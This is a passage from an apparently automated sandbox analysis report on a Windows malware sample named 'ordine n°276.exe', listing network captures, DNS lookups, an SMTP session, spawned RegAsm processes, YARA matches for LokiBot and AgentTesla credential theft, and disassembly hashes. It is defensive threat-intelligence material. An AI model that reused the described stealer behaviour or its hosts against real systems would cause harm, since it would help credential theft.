May 5, 2021 17:01:59.723294020 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.723319054 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.723350048 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.724011898 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.724054098 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.724075079 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.724097967 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.724886894 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.724930048 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.724965096 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.724984884 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.725667953 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.725711107 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.725730896 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.725919962 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.726466894 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.726510048 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.726526976 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.726557016 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.727250099 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.727302074 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.727339029 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.727353096 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.727946043 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.727989912 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.728019953 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.728034019 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.728744984 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.728786945 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.728821039 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.728835106 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.729487896 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.729528904 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.729552984 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.729573965 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.730206966 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.730247021 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.730330944 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.730986118 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.731029034 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.731050968 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.731074095 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.731690884 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.731731892 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.731767893 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.731790066 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.732446909 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.732492924 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.732525110 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.732541084 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.733163118 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.733213902 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.733246088 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.733263969 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.733855963 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.733900070 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.733926058 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.733966112 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.734587908 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.734627008 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.734649897 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.734683037 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.735321999 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.735364914 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.735385895 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.735414982 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.735997915 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.736042976 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.736063004 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.736087084 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:01:59.736612082 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:01:59.736681938 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:03:28.600476027 CEST	49777	587	192.168.2.4	46.16.61.250
May 5, 2021 17:03:28.682292938 CEST	587	49777	46.16.61.250	192.168.2.4
May 5, 2021 17:03:28.682434082 CEST	49777	587	192.168.2.4	46.16.61.250
May 5, 2021 17:03:28.988922119 CEST	49777	587	192.168.2.4	46.16.61.250
May 5, 2021 17:03:28.999555111 CEST	587	49777	46.16.61.250	192.168.2.4
May 5, 2021 17:03:28.999886036 CEST	49777	587	192.168.2.4	46.16.61.250
May 5, 2021 17:03:29.050403118 CEST	587	49777	46.16.61.250	192.168.2.4
May 5, 2021 17:03:29.050498009 CEST	49777	587	192.168.2.4	46.16.61.250
May 5, 2021 17:03:29.050928116 CEST	587	49777	46.16.61.250	192.168.2.4
May 5, 2021 17:03:29.050991058 CEST	49777	587	192.168.2.4	46.16.61.250
May 5, 2021 17:03:29.368573904 CEST	49778	587	192.168.2.4	46.16.61.250
May 5, 2021 17:03:29.429560900 CEST	587	49778	46.16.61.250	192.168.2.4
May 5, 2021 17:03:29.429860115 CEST	49778	587	192.168.2.4	46.16.61.250
May 5, 2021 17:03:29.495770931 CEST	587	49778	46.16.61.250	192.168.2.4
May 5, 2021 17:03:29.496217966 CEST	49778	587	192.168.2.4	46.16.61.250
May 5, 2021 17:03:29.578203917 CEST	587	49778	46.16.61.250	192.168.2.4
May 5, 2021 17:03:29.579648972 CEST	587	49778	46.16.61.250	192.168.2.4
May 5, 2021 17:03:29.579931021 CEST	49778	587	192.168.2.4	46.16.61.250
May 5, 2021 17:03:29.642256975 CEST	587	49778	46.16.61.250	192.168.2.4
May 5, 2021 17:03:29.667602062 CEST	49778	587	192.168.2.4	46.16.61.250
May 5, 2021 17:03:29.732918024 CEST	587	49778	46.16.61.250	192.168.2.4
May 5, 2021 17:03:29.732950926 CEST	587	49778	46.16.61.250	192.168.2.4
May 5, 2021 17:03:29.732964039 CEST	587	49778	46.16.61.250	192.168.2.4
May 5, 2021 17:03:29.733107090 CEST	49778	587	192.168.2.4	46.16.61.250
May 5, 2021 17:03:29.739896059 CEST	49778	587	192.168.2.4	46.16.61.250
May 5, 2021 17:03:29.792289019 CEST	49778	587	192.168.2.4	46.16.61.250
May 5, 2021 17:03:29.801448107 CEST	587	49778	46.16.61.250	192.168.2.4
May 5, 2021 17:03:29.801724911 CEST	49778	587	192.168.2.4	46.16.61.250
May 5, 2021 17:03:29.854123116 CEST	587	49778	46.16.61.250	192.168.2.4
May 5, 2021 17:03:29.855143070 CEST	49778	587	192.168.2.4	46.16.61.250
May 5, 2021 17:03:47.787031889 CEST	49766	443	192.168.2.4	216.58.212.129
May 5, 2021 17:03:47.827931881 CEST	443	49766	216.58.212.129	192.168.2.4
May 5, 2021 17:03:47.828006029 CEST	49766	443	192.168.2.4	216.58.212.129

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 5, 2021 17:01:03.690494061 CEST	58028	53	192.168.2.4	8.8.8.8
May 5, 2021 17:01:03.739600897 CEST	53	58028	8.8.8.8	192.168.2.4
May 5, 2021 17:01:03.983526945 CEST	53097	53	192.168.2.4	8.8.8.8
May 5, 2021 17:01:04.033890963 CEST	53	53097	8.8.8.8	192.168.2.4
May 5, 2021 17:01:04.040508032 CEST	49257	53	192.168.2.4	8.8.8.8
May 5, 2021 17:01:04.092152119 CEST	53	49257	8.8.8.8	192.168.2.4
May 5, 2021 17:01:04.267797947 CEST	62389	53	192.168.2.4	8.8.8.8
May 5, 2021 17:01:04.319478989 CEST	53	62389	8.8.8.8	192.168.2.4
May 5, 2021 17:01:05.427966118 CEST	49910	53	192.168.2.4	8.8.8.8
May 5, 2021 17:01:05.481971025 CEST	53	49910	8.8.8.8	192.168.2.4
May 5, 2021 17:01:07.142071962 CEST	55854	53	192.168.2.4	8.8.8.8
May 5, 2021 17:01:07.193872929 CEST	53	55854	8.8.8.8	192.168.2.4
May 5, 2021 17:01:08.334923029 CEST	64549	53	192.168.2.4	8.8.8.8
May 5, 2021 17:01:08.387028933 CEST	53	64549	8.8.8.8	192.168.2.4
May 5, 2021 17:01:09.247404099 CEST	63153	53	192.168.2.4	8.8.8.8
May 5, 2021 17:01:09.304781914 CEST	53	63153	8.8.8.8	192.168.2.4
May 5, 2021 17:01:10.437279940 CEST	52991	53	192.168.2.4	8.8.8.8
May 5, 2021 17:01:10.487998009 CEST	53	52991	8.8.8.8	192.168.2.4
May 5, 2021 17:01:11.466536999 CEST	53700	53	192.168.2.4	8.8.8.8
May 5, 2021 17:01:11.515269041 CEST	53	53700	8.8.8.8	192.168.2.4
May 5, 2021 17:01:12.525285959 CEST	51726	53	192.168.2.4	8.8.8.8
May 5, 2021 17:01:12.574664116 CEST	53	51726	8.8.8.8	192.168.2.4
May 5, 2021 17:01:13.431174040 CEST	56794	53	192.168.2.4	8.8.8.8
May 5, 2021 17:01:13.480317116 CEST	53	56794	8.8.8.8	192.168.2.4
May 5, 2021 17:01:14.339106083 CEST	56534	53	192.168.2.4	8.8.8.8
May 5, 2021 17:01:14.395970106 CEST	53	56534	8.8.8.8	192.168.2.4
May 5, 2021 17:01:15.286114931 CEST	56627	53	192.168.2.4	8.8.8.8
May 5, 2021 17:01:15.346343994 CEST	53	56627	8.8.8.8	192.168.2.4
May 5, 2021 17:01:16.277062893 CEST	56621	53	192.168.2.4	8.8.8.8
May 5, 2021 17:01:16.327723026 CEST	53	56621	8.8.8.8	192.168.2.4
May 5, 2021 17:01:17.205954075 CEST	63116	53	192.168.2.4	8.8.8.8
May 5, 2021 17:01:17.257935047 CEST	53	63116	8.8.8.8	192.168.2.4
May 5, 2021 17:01:18.124769926 CEST	64078	53	192.168.2.4	8.8.8.8
May 5, 2021 17:01:18.173777103 CEST	53	64078	8.8.8.8	192.168.2.4
May 5, 2021 17:01:19.120851040 CEST	64801	53	192.168.2.4	8.8.8.8
May 5, 2021 17:01:19.171756029 CEST	53	64801	8.8.8.8	192.168.2.4
May 5, 2021 17:01:19.999878883 CEST	61721	53	192.168.2.4	8.8.8.8
May 5, 2021 17:01:20.048785925 CEST	53	61721	8.8.8.8	192.168.2.4
May 5, 2021 17:01:21.745997906 CEST	51255	53	192.168.2.4	8.8.8.8
May 5, 2021 17:01:21.796354055 CEST	53	51255	8.8.8.8	192.168.2.4
May 5, 2021 17:01:27.584459066 CEST	61522	53	192.168.2.4	8.8.8.8
May 5, 2021 17:01:27.635942936 CEST	53	61522	8.8.8.8	192.168.2.4
May 5, 2021 17:01:34.861730099 CEST	52337	53	192.168.2.4	8.8.8.8
May 5, 2021 17:01:34.922353029 CEST	53	52337	8.8.8.8	192.168.2.4
May 5, 2021 17:01:39.237457991 CEST	55046	53	192.168.2.4	8.8.8.8
May 5, 2021 17:01:39.297370911 CEST	53	55046	8.8.8.8	192.168.2.4
May 5, 2021 17:01:52.846262932 CEST	49612	53	192.168.2.4	8.8.8.8
May 5, 2021 17:01:52.994647980 CEST	53	49612	8.8.8.8	192.168.2.4
May 5, 2021 17:01:53.728523016 CEST	49285	53	192.168.2.4	8.8.8.8
May 5, 2021 17:01:53.861010075 CEST	53	49285	8.8.8.8	192.168.2.4
May 5, 2021 17:01:54.406605959 CEST	50601	53	192.168.2.4	8.8.8.8
May 5, 2021 17:01:54.464427948 CEST	53	50601	8.8.8.8	192.168.2.4
May 5, 2021 17:01:54.866115093 CEST	60875	53	192.168.2.4	8.8.8.8
May 5, 2021 17:01:54.928509951 CEST	53	60875	8.8.8.8	192.168.2.4
May 5, 2021 17:01:55.453356028 CEST	56448	53	192.168.2.4	8.8.8.8
May 5, 2021 17:01:55.512281895 CEST	53	56448	8.8.8.8	192.168.2.4
May 5, 2021 17:01:55.862121105 CEST	59172	53	192.168.2.4	8.8.8.8
May 5, 2021 17:01:55.927783012 CEST	53	59172	8.8.8.8	192.168.2.4
May 5, 2021 17:01:56.062057972 CEST	62420	53	192.168.2.4	8.8.8.8
May 5, 2021 17:01:56.110846043 CEST	53	62420	8.8.8.8	192.168.2.4
May 5, 2021 17:01:56.558742046 CEST	60579	53	192.168.2.4	8.8.8.8
May 5, 2021 17:01:56.621804953 CEST	53	60579	8.8.8.8	192.168.2.4
May 5, 2021 17:01:57.367877007 CEST	50183	53	192.168.2.4	8.8.8.8
May 5, 2021 17:01:57.429572105 CEST	53	50183	8.8.8.8	192.168.2.4
May 5, 2021 17:01:57.893667936 CEST	61531	53	192.168.2.4	8.8.8.8
May 5, 2021 17:01:57.950640917 CEST	53	61531	8.8.8.8	192.168.2.4
May 5, 2021 17:01:58.288770914 CEST	49228	53	192.168.2.4	8.8.8.8
May 5, 2021 17:01:58.346333981 CEST	53	49228	8.8.8.8	192.168.2.4
May 5, 2021 17:01:58.408456087 CEST	59794	53	192.168.2.4	8.8.8.8
May 5, 2021 17:01:58.466267109 CEST	53	59794	8.8.8.8	192.168.2.4
May 5, 2021 17:01:58.743185043 CEST	55916	53	192.168.2.4	8.8.8.8
May 5, 2021 17:01:59.041968107 CEST	53	55916	8.8.8.8	192.168.2.4
May 5, 2021 17:01:59.065201998 CEST	52752	53	192.168.2.4	8.8.8.8
May 5, 2021 17:01:59.133631945 CEST	53	52752	8.8.8.8	192.168.2.4
May 5, 2021 17:02:10.696511984 CEST	60542	53	192.168.2.4	8.8.8.8
May 5, 2021 17:02:10.772339106 CEST	53	60542	8.8.8.8	192.168.2.4
May 5, 2021 17:02:10.826412916 CEST	60689	53	192.168.2.4	8.8.8.8
May 5, 2021 17:02:10.900535107 CEST	53	60689	8.8.8.8	192.168.2.4
May 5, 2021 17:02:15.434143066 CEST	64206	53	192.168.2.4	8.8.8.8
May 5, 2021 17:02:15.493031979 CEST	53	64206	8.8.8.8	192.168.2.4
May 5, 2021 17:02:43.400177956 CEST	50904	53	192.168.2.4	8.8.8.8
May 5, 2021 17:02:43.460458994 CEST	53	50904	8.8.8.8	192.168.2.4
May 5, 2021 17:02:44.388366938 CEST	57525	53	192.168.2.4	8.8.8.8
May 5, 2021 17:02:44.457710981 CEST	53	57525	8.8.8.8	192.168.2.4
May 5, 2021 17:02:46.015604973 CEST	53814	53	192.168.2.4	8.8.8.8
May 5, 2021 17:02:46.088701010 CEST	53	53814	8.8.8.8	192.168.2.4
May 5, 2021 17:03:28.515350103 CEST	53418	53	192.168.2.4	8.8.8.8
May 5, 2021 17:03:28.581509113 CEST	53	53418	8.8.8.8	192.168.2.4
May 5, 2021 17:03:29.291996956 CEST	62833	53	192.168.2.4	8.8.8.8
May 5, 2021 17:03:29.367165089 CEST	53	62833	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 5, 2021 17:01:59.065201998 CEST	192.168.2.4	8.8.8.8	0xbabd	Standard query (0)	doc-10-9k-docs.googleusercontent.com	A (IP address)	IN (0x0001)
May 5, 2021 17:03:28.515350103 CEST	192.168.2.4	8.8.8.8	0xff76	Standard query (0)	smtp.fil-net.com	A (IP address)	IN (0x0001)
May 5, 2021 17:03:29.291996956 CEST	192.168.2.4	8.8.8.8	0x726d	Standard query (0)	smtp.fil-net.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 5, 2021 17:01:59.133631945 CEST	8.8.8.8	192.168.2.4	0xbabd	No error (0)	doc-10-9k-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
May 5, 2021 17:01:59.133631945 CEST	8.8.8.8	192.168.2.4	0xbabd	No error (0)	googlehosted.l.googleusercontent.com		216.58.212.129	A (IP address)	IN (0x0001)
May 5, 2021 17:03:28.581509113 CEST	8.8.8.8	192.168.2.4	0xff76	No error (0)	smtp.fil-net.com		46.16.61.250	A (IP address)	IN (0x0001)
May 5, 2021 17:03:29.367165089 CEST	8.8.8.8	192.168.2.4	0x726d	No error (0)	smtp.fil-net.com		46.16.61.250	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
May 5, 2021 17:01:59.229300976 CEST	216.58.212.129	443	192.168.2.4	49766	CN=*.googleusercontent.com CN=GTS CA 1C3, O=Google Trust Services LLC, C=US CN=GTS Root R1, O=Google Trust Services LLC, C=US	CN=GTS CA 1C3, O=Google Trust Services LLC, C=US CN=GTS Root R1, O=Google Trust Services LLC, C=US CN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BE	Tue Apr 13 12:41:17 CEST 2021 Thu Aug 13 02:00:42 CEST 2020 Fri Jun 19 02:00:42 CEST 2020	Tue Jul 06 12:41:16 CEST 2021 Thu Sep 30 02:00:42 CEST 2027 Fri Jan 28 01:00:42 CET 2028	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
					CN=GTS CA 1C3, O=Google Trust Services LLC, C=US	CN=GTS Root R1, O=Google Trust Services LLC, C=US	Thu Aug 13 02:00:42 CEST 2020	Thu Sep 30 02:00:42 CEST 2027
					CN=GTS Root R1, O=Google Trust Services LLC, C=US	CN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BE	Fri Jun 19 02:00:42 CEST 2020	Fri Jan 28 01:00:42 CET 2028

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
May 5, 2021 17:03:28.999555111 CEST	587	49777	46.16.61.250	192.168.2.4	220 vxsys-smtpclusterma-05.srv.cat ESMTP
May 5, 2021 17:03:29.495770931 CEST	587	49778	46.16.61.250	192.168.2.4	220 vxsys-smtpclusterma-03.srv.cat ESMTP
May 5, 2021 17:03:29.496217966 CEST	49778	587	192.168.2.4	46.16.61.250	EHLO 131521
May 5, 2021 17:03:29.579648972 CEST	587	49778	46.16.61.250	192.168.2.4	250-vxsys-smtpclusterma-03.srv.cat 250-PIPELINING 250-SIZE 47185920 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN CRAM-MD5 DIGEST-MD5 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING
May 5, 2021 17:03:29.579931021 CEST	49778	587	192.168.2.4	46.16.61.250	STARTTLS
May 5, 2021 17:03:29.642256975 CEST	587	49778	46.16.61.250	192.168.2.4	220 2.0.0 Ready to start TLS

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: ordine n#U00b0 276.exe PID: 6992 Parent PID: 5888

General

Start time:	17:01:09
Start date:	05/05/2021
Path:	C:\Users\user\Desktop\ordine n#U00b0 276.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\ordine n#U00b0 276.exe'
Imagebase:	0x400000
File size:	98304 bytes
MD5 hash:	10F03C95BA280CD5A82146269F89CA9D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000000.00000000.638126535.000000000040C000.00000020.00020000.sdmp, Author: Florian Roth Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000000.00000002.749114091.000000000040C000.00000020.00020000.sdmp, Author: Florian Roth
Reputation:	low

Chronological Activities

Analysis Process: RegAsm.exe PID: 2588 Parent PID: 6992

General

Start time:	17:01:35
Start date:	05/05/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\ordine n#U00b0 276.exe'
Imagebase:	0x360000
File size:	53248 bytes
MD5 hash:	529695608EAFBED00ACA9E61EF333A7C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: RegAsm.exe PID: 6592 Parent PID: 6992

General

Start time:	17:01:36
Start date:	05/05/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\ordine n#U00b0 276.exe'
Imagebase:	0x2d0000
File size:	53248 bytes
MD5 hash:	529695608EAFBED00ACA9E61EF333A7C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: RegAsm.exe PID: 6412 Parent PID: 6992

General

Start time:	17:01:36
Start date:	05/05/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\ordine n#U00b0 276.exe'
Imagebase:	0x880000
File size:	53248 bytes
MD5 hash:	529695608EAFBED00ACA9E61EF333A7C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.1035317634.000000001DA61000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.1035317634.000000001DA61000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6468 Parent PID: 6412

General

Start time:	17:01:37
Start date:	05/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: ordine n#U00b0 276.exe PID: 6992 Parent PID: 5888 ordine n#U00b0 276.exeCOMMON

Execution Graph

Execution Coverage:	6.3%
Dynamic/Decrypted Code Coverage:	1.4%
Signature Coverage:	0.7%
Total number of Nodes:	291
Total number of Limit Nodes:	84

Executed Functions

Function 00404746, Relevance: 47.0, APIs: 1, Strings: 30, Instructions: 529
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,-00000001001A0436,-00000002FFF96E09), ref: 0040507E

Strings

====, xrefs: 004047D6
====, xrefs: 004047A4
====, xrefs: 004047AE
====, xrefs: 0040475E
====, xrefs: 00404754
====, xrefs: 004047C7
====, xrefs: 0040478B
====, xrefs: 004047D1
====, xrefs: 004047B8
====, xrefs: 004047B3
====, xrefs: 0040479A
====, xrefs: 00404759
====, xrefs: 004047C2
====, xrefs: 00404772
====, xrefs: 004047BD
====, xrefs: 0040474F
====, xrefs: 00404790
====, xrefs: 004047A9
====, xrefs: 00404786
====, xrefs: 00404781
====, xrefs: 0040474A
====, xrefs: 004047CC
====, xrefs: 0040476D
====, xrefs: 0040479F
====, xrefs: 00404777
====, xrefs: 00404763
====, xrefs: 0040477C
====, xrefs: 00404795
====, xrefs: 00404768
====, xrefs: 004047DB

Memory Dump Source

Source File: 00000000.00000002.749107372.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.749098092.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749102468.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749114091.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749120964.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.749125569.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: ====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====
API String ID: 4275171209-678356134
Opcode ID: 3a5876b740b61043a6dfa0dc728ab924d322831a8743a33b72832fffa009b4d2
Instruction ID: fbf3f0a8b09d1057fc37d39a2075e66043d6fbe8c0fe7386123008c07a913bba
Opcode Fuzzy Hash: 3a5876b740b61043a6dfa0dc728ab924d322831a8743a33b72832fffa009b4d2
Instruction Fuzzy Hash: 30B15962B1AB000B875D94BE99D096790C39FDE250239E63D252EF33A9FD79CD4A054C

Uniqueness

Uniqueness Score: -1.00%

Function 004039C7, Relevance: 2.8, APIs: 1, Instructions: 1560COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.749107372.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.749098092.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749102468.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749114091.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749120964.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.749125569.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f8d9c7706a87d3193b948298e70c7d89d6cec1f54b762036c27f36034aa381c
Instruction ID: d55afde535935a96497b7aee2788d25533d00d58dfe5069dbd7c0a335e17a20e
Opcode Fuzzy Hash: 1f8d9c7706a87d3193b948298e70c7d89d6cec1f54b762036c27f36034aa381c
Instruction Fuzzy Hash: C372F211F1960007CB2D8C7E4485527ACDB8BEA32663891BF929DF73E6E97D9E0B050D

Uniqueness

Uniqueness Score: -1.00%

Function 004037CB, Relevance: 2.4, APIs: 1, Instructions: 1137
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.749107372.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.749098092.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749102468.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749114091.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749120964.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.749125569.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6487c0f73c7dbbd1879dfec40302840c37c895b982b81a264d5ea800d2cb642
Instruction ID: 4b6931673095879613408aba442fe958ae460836d94d567a29f30bd2fe136a16
Opcode Fuzzy Hash: a6487c0f73c7dbbd1879dfec40302840c37c895b982b81a264d5ea800d2cb642
Instruction Fuzzy Hash: 3B424C62B1A7000B875E94BE98D0966D1C39FEE251229E63D252EF73A9FD79CC0B114C

Uniqueness

Uniqueness Score: -1.00%

Function 004038C1, Relevance: 2.4, APIs: 1, Instructions: 1107
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.749107372.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.749098092.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749102468.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749114091.000000000040C000.00000020.00020000.sdmp Download File
